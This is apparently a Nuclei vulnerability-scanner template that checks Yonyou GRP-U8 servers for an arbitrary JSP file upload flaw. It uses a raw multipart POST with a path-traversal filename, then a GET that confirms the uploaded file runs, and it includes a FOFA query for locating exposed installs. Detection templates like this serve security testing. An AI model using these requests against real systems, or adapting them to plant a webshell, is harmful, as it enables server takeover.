nuclei-templates/http/vulnerabilities/yonyou/grp-u8-uploadfiledata-fileu...

49 lines
1.5 KiB
YAML
Executable File

id: grp-u8-uploadfiledata
info:
name: UFIDA GRP-U8 UploadFileData - Arbitrary File Upload
author: SleepingBag945
severity: critical
description: |
File upload vulnerability in UFIDA U8+ERP customer relationship management software. An attacker can use this vulnerability to gain control of the server.
reference:
- https://mp.weixin.qq.com/s/DZXFxLC7fFKbPUWrdyITag
metadata:
max-request: 2
fofa-query: title="用友GRP-U8行政事业内控管理软件"
verified: true
tags: yonyou,fileupload,grp,intrusive
http:
- raw:
- |
POST /UploadFileData?action=upload_file&filename=../{{randstr_1}}.jsp HTTP/1.1
Host: {{Hostname}}
Content-Length: 327
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqoqnjtcw
Accept-Encoding: gzip
------WebKitFormBoundaryqoqnjtcw
Content-Disposition: form-data; name="upload"; filename="emgeyr.jsp"
Content-Type: application/octet-stream
<% {out.print("{{randstr_2}}");} %>
------WebKitFormBoundaryqoqnjtcw
Content-Disposition: form-data; name="submit"
submit
------WebKitFormBoundaryqoqnjtcw--
- |
GET /R9iPortal/{{randstr_1}}.jsp HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && contains(body_1,'showSucceedMsg')"
- "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')"
condition: and